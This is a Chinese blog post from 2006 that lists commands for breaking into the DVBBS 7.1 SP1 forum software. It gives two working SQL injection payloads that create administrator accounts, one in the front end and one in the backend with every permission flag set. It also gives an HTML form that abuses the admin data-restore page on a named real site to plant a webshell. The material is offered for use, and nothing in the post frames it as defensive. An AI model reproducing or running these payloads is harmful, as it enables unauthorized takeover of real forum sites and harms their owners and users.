入侵动网7.1 SP1 用到的命令

首页 > 技术文章 > 入侵动网7.1 SP1 用到的命令

入侵动网7.1 SP1 用到的命令

2006年9月21日 Chinadu 发表评论 84 views 阅读评论

增加前台管理员用户名：
coolidea|||123',0);update/**/Dv_User/**/set/**/UsergroupID='1'/**/where[UserName]='h4x0r';--

加后台管理员用户：
coolidea|||123',0);insert/**/into/**/Dv_admin(Password,Username,Adduser,Flag)/**/values('469e80d32c0559f8','h4x0r','h4x0r','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,');--

拿webshell

<form action="http://www.zhsc.net/bbs/admin/data.asp?action=RestoreData&act=Restore" method="post"> <p>已上传文件的位置：<input name="Dbpath" type="text" size="80"></p> <p>要复制到的位置：<input name="backpath" type="text" size="80"></p> <p><input type="submit" value="提交"></p>

不必要在注入拿SHELL了，很方便

只针对SQL版有效~

2009年10月27日 -- 动网8.0-8.2通杀0DAY
2009年09月29日 -- 动网多个版本上传漏洞
2009年09月4日 -- DVBBS php v2.0 boardrule.php注入漏洞

分类: 技术文章标签: dvbbs

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

Serv-U本地权限提升的ASP实现 MS06-049 Windows ZwQuerySystemInformation Local Exploit

Chinadu's Blog

入侵动网7.1 SP1 用到的命令

相关文章

About Me

站内搜索

日历

最新文章

热门文章

近期评论

文章归档

Categories

Blogroll

Archives

2012 年五月
一	二	三	四	五	六	日
« 三
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31